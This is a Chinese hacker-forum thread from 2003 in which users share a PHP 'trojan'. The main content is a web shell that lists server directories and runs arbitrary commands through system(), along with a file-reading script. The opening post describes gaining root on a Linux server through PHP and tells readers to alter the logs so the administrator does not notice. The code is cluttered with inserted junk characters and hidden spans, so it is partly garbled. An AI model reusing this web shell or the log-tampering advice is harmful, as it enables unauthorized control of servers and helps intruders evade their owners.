我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 ) ?9 S" Y1 X* b& fxx.php如下（太简陋了，不免高手门笑话，hoho） ( p8 e: t C& x! Q H1 m( e) @5 n1 \: K! s8 f% [* N! _$ X) E2 {1 { G+ q8 i //获得指定文件的文本 ) A: ~) m- w7 `1 f! A3 I# B- i/ Rfunction getfile($filename) { if (!$filename){ return false; ! C+ _9 e* k) p' s } ; L& v0 k# b$ r1 v% c8 U $fp = @fopen($filename,"r"); 4 X. F5 \ I+ y/ ?2 A if (!$fp){ $ k: _) U9 \/ j# j/ K return false; * |+ ^, R) C3 e) R1 R } $fdata = @fread($fp,filesize($filename)); fclose($fp); ' |- M2 b0 c, [' @( M return $fdata; } 1 s4 ]1 r. T, B( { $str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ 但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 /* GNU */ /* 您可以任意传播，不过请一定写出作者名字 */ ) f2 Q$ w' V- t/* 4 G8 o( C! y2 q3 \4 ^4 X5 \+ K! U( d原作者： Martin Geisler 4 h7 s/ q3 i; d4 N改写汉化： YZHLINUX */ 9 a% ]4 n j/ O5 s2 i9 l+ R3 Y /* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ ) D6 \, J; O: E- @if (isset($work_dir)) { /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ # T9 e7 b5 X8 ]5 B5 a5 z5 O chdir($work_dir); $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 + p! @$ g7 g$ r( d; ]! O6 P} else { /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 注: $DOCUMENT_ROOT 是系统提供的*/ $ Q: Q) j5 v9 i# `) J chdir($DOCUMENT_ROOT); / O2 P1 {& X' y! r $work_dir = $DOCUMENT_ROOT; } " z- D2 D0 A, P) b) U6 g6 P7 F?> / K3 \: K6 j+ A$ ^# k

当前工作目录: 1 [6 \% U, E$ A $work_dir_splitted = explode("/", substr($work_dir, 1)); echo "Root/"; - O2 u- \ G8 K$ |9 n! lif ($work_dir_splitted[0] == "") { $work_dir = "/"; /* 根目录. */ 0 O! [; ?7 I8 t" |' W' g} else { for ($i = 0; $i < count($work_dir_splitted); $i++) { /* echo "i = $i";*/ % e% j3 a+ C. l/ Y9 ` $url .= "/".$work_dir_splitted[$i]; ( }0 N( `. S. X+ J) K echo "$work_dir_splitted[$i]/"; } } 0 E0 j* ^/ z/ @: H' ]- n. I?>

" S) v2 ]/ a! p1 A8 K

选择新的工作目录:

! p/ k9 V7 {% {2 O L- ^+ M' Z2 K /* 现在我们对这个目录坐一个文件列表 */ 2 N T6 h# ]1 Z) _8 B# U/ a U7 E& t$dir_handle = opendir($work_dir); |7 x5 ?2 \( I) L: F1 [0 c/* 来一个遍历找出所有的文件和目录 */ ' i9 U& l' v* k2 bwhile ($dir = readdir($dir_handle)) { " C6 b* L4 c# P( l0 w! K" E if (is_dir($dir)) { + b* W9 F3 I8 L; R if ($dir == ".") { 5 r! u L- S( `' n, H echo "Current Directory\n"; 8 g! | {5 P9 p } elseif ($dir == "..") { /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ if (strlen($work_dir) == 1) { 2 B! a0 ]( F. `; D" F2 T) J /* 长度只有 1 ---- 那么只能是 '/' 了 */ , Q u* Y* _; ]( I } elseif (strrpos($work_dir, "/") == 0) { /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ 5 s$ [( L% ~* f# K! T4 A, _ echo "Parent Directory\n"; ) A4 z+ F+ q9 C# k } else { . T+ K1 {1 R& ] M6 u echo "Parent Directory\n"; ! C8 I# Z2 {% \/ j- q ^. I } ( o5 W' [' y$ r0 w$ C; m } else { if ($work_dir == "/") { * F# {3 E- Q# j' x echo "$dir\n"; } else { " @/ k# p' A' V echo "$dir\n"; } } # Q; ?/ |. e9 g- M' |' Y } } closedir($dir_handle);//不要忘记关闭 ?> 5 `/ @% L- R3 U J; W' c) S8 I

命令:

>

1 q! d& C3 \) [1 t* h# O( J& C

是否捕获错误信息?

2 b2 \" o2 w3 \# C7 {0 N# [/ O- ~

Output:

<font class="jammer">( d# ?( X1 H+ v m ~- x' ]9 s% D</font> <?php <span style="display:none">! u' H# |) W' U3 t</span>if ($command) {<font class="jammer">& o/ m7 Z; f4 q+ A5 U/ q! I</font> if ($stderr) { <span style="display:none">9 r8 ~4 l- I6 s" w9 i+ R) f</span> /* 这个命令组能看懂吗? <span style="display:none"> F9 B/ a$ S/ C</span> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/ <span style="display:none">0 B6 d. j9 Y& @7 x</span> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); <span style="display:none">: `6 S6 E$ C0 g3 X( U# b</span> }else {<font class="jammer">/ Y, _& Q4 m" q& Q/ D6 e</font> system($command); <span style="display:none">0 D1 G# x5 Z" ]4 }6 [; @</span> } <span style="display:none">$ ?# J9 T- P+ F9 Z% |9 q</span>}<font class="jammer">' t. J \0 ^2 e5 r$ ?</font> ?><font class="jammer">1 S6 k, T/ y i, r</font> & M z% q- n( \' v" v

+ ]! B2 {2 u+ z, V* m # ~, O9 x& X3 }5 v 2 s9 N+ m( w0 j+ f# g" \: T8 }

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
! i* \6 @* b& t  \语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
1 b/ I$ p" D  g  a8 D不过不知道版权会被我们侵犯到什么地步 ：（
3 J4 u$ s7 j  J; p; s! k8 D) {

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
6 l6 G# `5 c9 V! t& M2 u我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
; d, r2 X, d& ?" }. R7 Z/ G: s6 q/ g我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
" d5 U. I1 `( d8 z" F9 d7 Z; d是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（
+ G- [" f) w! A& S7 K

我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！

yzhlounx 你是工程的吧  呵呵
/ h- |  K) H0 ^5 h1 _/ p